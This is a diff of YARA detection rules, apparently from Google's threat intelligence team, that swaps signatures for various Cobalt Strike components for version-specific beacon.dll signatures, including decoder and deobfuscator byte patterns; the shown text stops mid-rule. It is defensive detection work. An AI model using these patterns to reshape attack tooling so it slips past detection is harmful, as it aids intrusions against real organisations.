+ condition: + all of them +} +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_0_49 { meta: - description = "Cobalt Strike's resources/artifact32{.exe,.dll,big.exe,big.dll} and resources/dropper.exe signature for versions 1.49 to 3.14" + description = "Cobalt Strike's resources/beacon.dll Version 2.0.49" author = "gssincla@google.com" - id = "243e3761-cbea-561c-97da-f6ba12ebc7ee" + id = "087c584a-5ceb-536a-8842-53fbd668df54" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L17-L32" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L213-L243" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "40fc605a8b95bbd79a3bd7d9af73fbeebe3fada577c99e7a111f6168f6a0d37a" - logic_hash = "437706c808bca28384a6e8e24fa3ae120a4ebe4166fa4ca3564c58b881fb23a8" + hash = "ed08c1a21906e313f619adaa0a6e5eb8120cddd17d0084a30ada306f2aca3a4e" + logic_hash = "3616579dabcfd0ba413d17b4fbd0da5313b9beca94f7bf8e41f05d6679b4a215" score = 75 quality = 85 tags = "" strings: - $payloadDecoder = { 8B [2] 89 ?? 03 [2] 8B [2] 03 [2] 0F B6 18 8B [2] 89 ?? C1 ?? 1F C1 ?? 1E 01 ?? 83 ?? 03 29 ?? 03 [2] 0F B6 00 31 ?? 88 ?? 8B [2] 89 ?? 03 [2] 8B [2] 03 [2] 0F B6 12 } + $version_sig = { 83 F8 22 0F 87 96 01 00 00 FF 24 } + $decoder = { B1 ?? EB 03 8D 49 00 30 88 [4] 40 3D 30 05 00 00 72 F2 } condition: - any of them + all of them } -rule GCTI_Cobaltstrike_Resources_Artifact32_V3_1_And_V3_2 +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_1_And_V2_2 { meta: - description = "Cobalt Strike's resources/artifact32{.dll,.exe,svc.exe,big.exe,big.dll,bigsvc.exe} and resources/artifact32uac(alt).dll signature for versions 3.1 and 3.2" + description = "Cobalt Strike's resources/beacon.dll Versions 2.1 and 2.2" author = "gssincla@google.com" - id = "4fff7f42-9f50-5945-8ec0-2438ac5c7000" + id = "384fb247-aae7-52e1-a45d-6bda0f80a04e" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L34-L60" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L245-L276" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "4f14bcd7803a8e22e81e74d6061d0df9e8bac7f96f1213d062a29a8523ae4624" - logic_hash = "7a0d33d0260c762b4aa67e4084d7474338c60aa684fd3e622614745d90350da8" + hash = "ae7a1d12e98b8c9090abe19bcaddbde8db7b119c73f7b40e76cdebb2610afdc2" + logic_hash = "eee3702d6fde08b8e9f5533f903fa33fb3da808a3b76ca43e4d5029f9ce91ad0" score = 75 quality = 85 tags = "" strings: - $decoderFunc = { 89 ?? B? 04 00 00 00 99 F7 FF 8B [2] 8A [2] 30 ?? 8A ?? 4? 88 } + $version_sig = { 49 56 57 83 F9 24 0F 87 8A 01 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Artifact32_V3_14_To_V4_X +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_3 { meta: - description = "Cobalt Strike's resources/artifact32{.dll,.exe,big.exe,big.dll,bigsvc.exe} signature for versions 3.14 to 4.x and resources/artifact32svc.exe for 3.14 to 4.x and resources/artifact32uac.dll for v3.14 and v4.0" + description = "Cobalt Strike's resources/beacon.dll Versions 2.3" author = "gssincla@google.com" - id = "8a010305-dce5-55f4-b2dd-a736721efe22" + id = "aed092f1-fbb1-5efe-be8d-fb7c5aba1cde" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Artifact32_and_Resources_Dropper_v1_45_to_v4_x.yara#L62-L89" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L278-L308" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "888bae8d89c03c1d529b04f9e4a051140ce3d7b39bc9ea021ad9fc7c9f467719" - logic_hash = "fc5c353c568e33df80fa5bab14d11112ca211e269043b83dba8b7d1a6a008a7b" + hash = "00dd982cb9b37f6effb1a5a057b6571e533aac5e9e9ee39a399bb3637775ff83" + logic_hash = "286d7ffa83634b82160788abaf1c5b319a09c4a1243af2401799f327be76ad75" score = 75 quality = 85 tags = "" strings: - $pushFmtStr = { C7 [3] 5C 00 00 00 C7 [3] 65 00 00 00 C7 [3] 70 00 00 00 C7 [3] 69 00 00 00 C7 [3] 70 00 00 00 F7 F1 C7 [3] 5C 00 00 00 C7 [3] 2E 00 00 00 C7 [3] 5C 00 00 00 } - $fmtStr = "%c%c%c%c%c%c%c%c%cMSSE-%d-server" + $version_sig = { 49 56 57 83 F9 26 0F 87 A9 01 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Covertvpn_Dll_V2_1_To_V4_X +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_4 { meta: - description = "Cobalt Strike's resources/covertvpn.dll signature for version v2.2 to v4.4" + description = "Cobalt Strike's resources/beacon.dll Versions 2.4" author = "gssincla@google.com" - id = "a65b855c-5703-5b9f-bb57-da8ebf898f9b" + id = "347a6b06-84a8-53ff-80a1-05fa1a48a412" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Covertvpn_Dll_v2_1_to_v4_x.yara#L17-L120" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L310-L340" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "0a452a94d53e54b1df6ba02bc2f02e06d57153aad111171a94ec65c910d22dcf" - logic_hash = "1f6e4254fdfd4f9b13c2000333aabbb7da90d2df7ee1b12faa6ea3c066351468" + hash = "78c6f3f2b80e6140c4038e9c2bcd523a1b205d27187e37dc039ede4cf560beed" + logic_hash = "087ec6f585e90b84c00e746beb37cb8365cb7b4d07ebd0c48e3ba3d5df94dba2" score = 75 quality = 85 tags = "" strings: - $dropComponentsAndActivateDriver_prologue = { - 5? - 68 [4] - 68 [4] - C7 [3-5] 00 00 00 00 - FF 15 [4] - 50 - FF 15 [4] - 8B ?? - 85 ?? - 74 ?? - 8D [3-5] - 5? - FF 15 [4] - 50 - } - $dropFile = { - 6A 00 - 5? - E8 [4] - 83 C4 08 - 83 F8 FF - 74 ?? - 5? - [0-5] - E8 [4] - 83 C4 ?? - [0-2] - 6A 00 - 68 80 01 00 00 - 6A 02 - 6A 00 - 6A 05 - 68 00 00 00 40 - 5? - FF 15 [4] - 8B ?? - 83 ?? FF - 75 ?? - FF 15 [4] - 5? - } - $nfp = "npf.sys" nocase - $wpcap = "wpcap.dll" nocase + $version_sig = { 4A 56 57 83 FA 2F 0F 87 F9 01 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Elevate_Dll_V3_0_To_V3_14_And_Sleeve_Elevate_Dll_V4_X +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_5 { meta: - description = "Cobalt Strike's resources/elevate.dll signature for v3.0 to v3.14 and sleeve/elevate.dll for v4.x" + description = "Cobalt Strike's resources/beacon.dll Versions 2.5" author = "gssincla@google.com" - id = "170f62a2-ba4f-5be8-9ec5-402eb7bbde4e" + id = "a89f9239-099c-5b97-b1df-e8ce2b95ea52" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Elevate_Dll_v3_0_to_v3_14_and_Sleeve_Elevate_Dll_v4_x.yara#L17-L68" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L342-L372" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "6deeb2cafe9eeefe5fc5077e63cc08310f895e9d5d492c88c4e567323077aa2f" - logic_hash = "766a0a390ed8cefe43d82a054a9b2cfec7eced75e0d7ee10231215043577b75e" + hash = "d99693e3e521f42d19824955bef0cefb79b3a9dbf30f0d832180577674ee2b58" + logic_hash = "f2d0ca1414a60bf855543d99777ae5e83c451db41aba5e255e4c10b1e0bb7b47" score = 75 quality = 85 tags = "" strings: - $wnd_proc = { - 6A 00 - 6A 28 - 68 00 01 00 00 - 5? - C7 [5] 01 00 00 00 - FF ?? - 6A 00 - 6A 27 - 68 00 01 00 00 - 5? - FF ?? - 6A 00 - 6A 00 - 68 01 02 00 00 - 5? - FF ?? - } + $version_sig = { 48 57 8B F2 83 F8 3A 0F 87 6E 02 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } condition: - $wnd_proc + all of them } -rule GCTI_Cobaltstrike_Sleeve_Beaconloader_HA_X86_O_V4_3_V4_4_V4_5_And_V4_6 +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_0 { meta: - description = "Cobalt Strike's sleeve/BeaconLoader.HA.x86.o (HeapAlloc) Versions 4.3 through at least 4.6" + description = "Cobalt Strike's resources/beacon.dll Versions 3.0" author = "gssincla@google.com" - id = "0ee3fa6f-367c-596f-a3bc-3bcfa61b97aa" + id = "132a1be8-f529-5141-ba03-fdf6df3d55d4" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L17-L59" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L374-L404" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "8e4a1862aa3693f0e9011ade23ad3ba036c76ae8ccfb6585dc19ceb101507dcd" - logic_hash = "d02257bc556d0b1675997ab6af1b28cf5f498855d6254e3c1cd7eb4a0c4d2715" + hash = "30251f22df7f1be8bc75390a2f208b7514647835f07593f25e470342fd2e3f52" + logic_hash = "951f1b52c14010261022f9f920d53d3c1e88f41461798a23e72083c981f9de76" score = 75 quality = 85 tags = "" strings: - $core_sig = { - C6 45 F0 48 - C6 45 F1 65 - C6 45 F2 61 - C6 45 F3 70 - C6 45 F4 41 - C6 45 F5 6C - C6 45 F6 6C - C6 45 F7 6F - C6 45 F8 63 - C6 45 F9 00 - } + $version_sig = { 48 57 8B F2 83 F8 3C 0F 87 89 02 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } condition: all of them } -rule GCTI_Cobaltstrike_Sleeve_Beaconloader_MVF_X86_O_V4_3_V4_4_V4_5_And_V4_6 +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_1 { meta: - description = "Cobalt Strike's sleeve/BeaconLoader.MVF.x86.o (MapViewOfFile) Versions 4.3 through at least 4.6" + description = "Cobalt Strike's resources/beacon.dll Versions 3.1" author = "gssincla@google.com" - id = "3f7c0553-989e-53e7-87a9-3fa1c47f4b62" + id = "aa511dee-69ea-53bd-be90-d2d03d08c550" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L61-L111" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L406-L461" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "cded3791caffbb921e2afa2de4c04546067c3148c187780066e8757e67841b44" - logic_hash = "dd831fb01a403213c06e3d07daf3da5f56655619a686149f9d4beec2331fe6ca" + hash = "4de723e784ef4e1633bbbd65e7665adcfb03dd75505b2f17d358d5a40b7f35cf" + logic_hash = "2d91add3aefe69b4525f93f7ea9f2fcbd7a6c506a224997ff73a2eeef63a8cd4" score = 75 quality = 85 tags = "" strings: - $core_sig = { - C6 45 EC 4D - C6 45 ED 61 - C6 45 EE 70 - C6 45 EF 56 - C6 45 F0 69 - C6 45 F1 65 - C6 45 F2 77 - C6 45 F3 4F - C6 45 F4 66 - C6 45 F5 46 - C6 45 F6 69 - C6 45 F7 6C - C6 45 F8 65 - C6 45 F9 00 - } + $version_sig = { 55 8B EC 83 EC 58 A1 [4] 33 C5 89 45 FC E8 DF F5 FF FF 6A 50 8D 45 A8 50 FF 15 [4] 8D 45 ?? 50 FF 15 [4] 85 C0 74 14 8B 40 0C 83 38 00 74 0C 8B 00 FF 30 FF 15 [4] EB 05 B8 [4] 8B 4D FC 33 CD E8 82 B7 00 00 C9 } + $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } condition: all of them } -rule GCTI_Cobaltstrike_Sleeve_Beaconloader_VA_X86_O_V4_3_V4_4_V4_5_And_V4_6 +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_2 { meta: - description = "Cobalt Strike's sleeve/BeaconLoader.VA.x86.o (VirtualAlloc) Versions 4.3 through at least 4.6" + description = "Cobalt Strike's resources/beacon.dll Versions 3.2" author = "gssincla@google.com" - id = "5f89c4be-f4c5-54d3-b923-d125de53902f" + id = "3ccbc0f2-241c-5c10-8930-4a3d264d3b57" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L114-L194" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L463-L528" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1" - logic_hash = "19b2297986bd72204fb117560cddcfb512f5db6c157d9730b5802bf9f968eef4" + hash = "b490eeb95d150530b8e155da5d7ef778543836a03cb5c27767f1ae4265449a8d" + logic_hash = "e1fe0d58d86ad8c845d65608314007ce08e3e524fb92cdb33ddae860c640e3e9" score = 75 quality = 85 tags = "" + rs2 = "a93647c373f16d61c38ba6382901f468247f12ba8cbe56663abb2a11ff2a5144" strings: - $core_sig = { - C6 45 B0 56 - C6 45 B1 69 - C6 45 B2 72 - C6 45 B3 74 - C6 45 B4 75 - C6 45 B5 61 - C6 45 B6 6C - C6 45 B7 41 - C6 45 B8 6C - C6 45 B9 6C - C6 45 BA 6F - C6 45 BB 63 - C6 45 BC 00 - } - $deobfuscator = { - 8B 4D FC - 83 C1 01 - 89 4D FC - 8B 55 FC - 3B 55 0C - 73 19 - 0F B6 45 10 - 8B 4D 08 - 03 4D FC - 0F BE 11 - 33 D0 - 8B 45 08 - 03 45 FC - 88 10 - EB D6 - } + $version_sig = { 48 57 8B F2 83 F8 3D 0F 87 83 02 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } + $version3_1_sig = { 55 8B EC 83 EC 58 A1 [4] 33 C5 89 45 FC E8 DF F5 FF FF 6A 50 8D 45 A8 50 FF 15 [4] 8D 45 ?? 50 FF 15 [4] 85 C0 74 14 8B 40 0C 83 38 00 74 0C 8B 00 FF 30 FF 15 [4] EB 05 B8 [4] 8B 4D FC 33 CD E8 82 B7 00 00 C9 } + + condition: + $version_sig and $decoder and not $version3_1_sig +} +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_3 +{ + meta: + description = "Cobalt Strike's resources/beacon.dll Versions 3.3" + author = "gssincla@google.com" + id = "7cce26c9-1403-535f-bd9d-19667c7e313c" + date = "2022-11-18" + modified = "2023-12-04" + reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L530-L560" + license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" + hash = "158dba14099f847816e2fc22f254c60e09ac999b6c6e2ba6f90c6dd6d937bc42" + logic_hash = "f9b9b669aacc156a4e07eab0c6a638f9b9d828e018d1db89e9e2c922641744ac" + score = 75 + quality = 85 + tags = "" + + strings: + $version_sig = { 48 57 8B F1 83 F8 41 0F 87 F0 02 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } condition: all of them } -rule GCTI_Cobaltstrike_Sleeve_Beaconloader_X86_O_V4_3_V4_4_V4_5_And_V4_6 +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_4 { meta: - description = "Cobalt Strike's sleeve/BeaconLoader.x86.o Versions 4.3 through at least 4.6" + description = "Cobalt Strike's resources/beacon.dll Versions 3.4" author = "gssincla@google.com" - id = "32a47966-f3bb-52c3-a977-82a1b09ddf2c" + id = "58a34ab6-c061-59a2-b929-8519d3d844e7" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L196-L276" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L562-L592" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "94d1b993a9d5786e0a9b44ea1c0dc27e225c9eb7960154881715c47f9af78cc1" - logic_hash = "cab5441ce7d919101fc04aa469e77b71a4c444443e44c752f18cbbc5b17ed5c2" + hash = "5c40bfa04a957d68a095dd33431df883e3a075f5b7dea3e0be9834ce6d92daa3" + logic_hash = "f3372bc538092e30c62d9599f76f2115dc73faf7a5fd6f86c8d4cfaa35473810" score = 75 quality = 85 tags = "" strings: - $core_sig = { - C6 45 B0 56 - C6 45 B1 69 - C6 45 B2 72 - C6 45 B3 74 - C6 45 B4 75 - C6 45 B5 61 - C6 45 B6 6C - C6 45 B7 41 - C6 45 B8 6C - C6 45 B9 6C - C6 45 BA 6F - C6 45 BB 63 - C6 45 BC 00 - } - $deobfuscator = { - 8B 4D FC - 83 C1 01 - 89 4D FC - 8B 55 FC - 3B 55 0C - 73 19 - 0F B6 45 10 - 8B 4D 08 - 03 4D FC - 0F BE 11 - 33 D0 - 8B 45 08 - 03 45 FC - 88 10 - EB D6 - } + $version_sig = { 48 57 8B F1 83 F8 42 0F 87 F0 02 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } condition: - $core_sig and not $deobfuscator + all of them } -rule GCTI_Cobaltstrike_Sleeve_Beaconloader_HA_X64_O_V4_3_V4_4_V4_5_And_V4_6 +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_5_Hf1_And_3_5_1 { meta: - description = "Cobalt Strike's sleeve/BeaconLoader.HA.x64.o (HeapAlloc) Versions 4.3 through at least 4.6" + description = "Cobalt Strike's resources/beacon.dll Versions 3.5-hf1 and 3.5.1 (3.5.x)" author = "gssincla@google.com" - id = "9b16ff13-2d8e-51dc-9f99-6c45eff76feb" + id = "1532596e-be0e-58c2-8d3b-5120c793d677" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L281-L323" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L594-L625" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "d64f10d5a486f0f2215774e8ab56087f32bef19ac666e96c5627c70d345a354d" - logic_hash = "b712a0c218e473f6c64fdead22b291d7fb0bac8ba614adcf1ba6431e854a5e65" + hash = "c78e70cd74f4acda7d1d0bd85854ccacec79983565425e98c16a9871f1950525" + logic_hash = "c2e975678815638803b04261d46bca216bc0b2f894a1f72fd0d5b949493401d1" score = 75 quality = 85 tags = "" strings: - $core_sig = { - C6 44 24 38 48 - C6 44 24 39 65 - C6 44 24 3A 61 - C6 44 24 3B 70 - C6 44 24 3C 41 - C6 44 24 3D 6C - C6 44 24 3E 6C - C6 44 24 3F 6F - C6 44 24 40 63 - C6 44 24 41 00 - } + $version_sig = { 48 57 8B F1 83 F8 43 0F 87 07 03 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Sleeve_Beaconloader_MVF_X64_O_V4_3_V4_4_V4_5_And_V4_6 +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_6 { meta: - description = "Cobalt Strike's sleeve/BeaconLoader.MVF.x64.o (MapViewOfFile) Versions 4.3 through at least 4.6" + description = "Cobalt Strike's resources/beacon.dll Versions 3.6" author = "gssincla@google.com" - id = "38e063db-3d76-5a94-812a-945fcf46a232" + id = "7e7b5c22-82b3-5298-b794-b06d94a668d5" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L326-L374" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L627-L657" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "9d5b6ccd0d468da389657309b2dc325851720390f9a5f3d3187aff7d2cd36594" - logic_hash = "6224000342d87041fd3336656897479c644e94ea36fc061c27fcd64233047c2c" + hash = "495a744d0a0b5f08479c53739d08bfbd1f3b9818d8a9cbc75e71fcda6c30207d" + logic_hash = "3bd3f0b8625e131726fa92d68de041dae6c3d5642cbf22ac596d1d82da1d4a07" score = 75 quality = 85 tags = "" strings: - $core_sig = { - C6 44 24 58 4D - C6 44 24 59 61 - C6 44 24 5A 70 - C6 44 24 5B 56 - C6 44 24 5C 69 - C6 44 24 5D 65 - C6 44 24 5E 77 - C6 44 24 5F 4F - C6 44 24 60 66 - C6 44 24 61 46 - C6 44 24 62 69 - C6 44 24 63 6C - C6 44 24 64 65 - } + $version_sig = { 48 57 8B F9 83 F8 47 0F 87 2F 03 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Sleeve_Beaconloader_VA_X64_O_V4_3_V4_4_V4_5_And_V4_6 +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_7 { meta: - description = "Cobalt Strike's sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6" + description = "Cobalt Strike's resources/beacon.dll Versions 3.7" author = "gssincla@google.com" - id = "8ca04f82-a8a8-5162-8b0c-8a7bce678a85" + id = "6352a31c-34b8-5886-8e34-ef9221c22e6e" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L376-L456" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L659-L689" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9" - logic_hash = "17402e952d71d02274a9b2814512b28a402e8d11a6c2a2375844fe24719f87a6" + hash = "f18029e6b12158fb3993f4951dab2dc6e645bb805ae515d205a53a1ef41ca9b2" + logic_hash = "6ceb2cec8402a4679bad42d367156c74e897af4188442fdebc70d6ce2dd78bd6" score = 75 quality = 85 tags = "" strings: - $core_sig = { - C6 44 24 48 56 - C6 44 24 49 69 - C6 44 24 4A 72 - C6 44 24 4B 74 - C6 44 24 4C 75 - C6 44 24 4D 61 - C6 44 24 4E 6C - C6 44 24 4F 41 - C6 44 24 50 6C - C6 44 24 51 6C - C6 44 24 52 6F - C6 44 24 53 63 - C6 44 24 54 00 - } - $deobfuscator = { - 8B 04 24 - FF C0 - 89 04 24 - 8B 44 24 28 - 39 04 24 - 73 20 - 8B 04 24 - 0F B6 4C 24 30 - 48 8B 54 24 20 - 0F BE 04 02 - 33 C1 - 8B 0C 24 - 48 8B 54 24 20 - 88 04 0A - } + $version_sig = { 48 57 8B F9 83 F8 49 0F 87 47 03 00 00 FF 24 } + $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Sleeve_Beaconloader_X64_O_V4_3_V4_4_V4_5_And_V4_6 +rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_8 { meta: - description = "Cobalt Strike's sleeve/BeaconLoader.x64.o (Base) Versions 4.3 through at least 4.6" + description = "Cobalt Strike's resources/beacon.dll Versions 3.8" author = "gssincla@google.com" - id = "07f751e4-f001-5b95-b229-31fbaa867cea" + id = "f76712a4-df1c-5e6b-b5ac-9c74f2e202fc" date = "2022-11-18" - modified = "2022-11-19" + modified = "2023-12-04" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Sleeve_BeaconLoader_all.yara#L458-L555" + source_url = 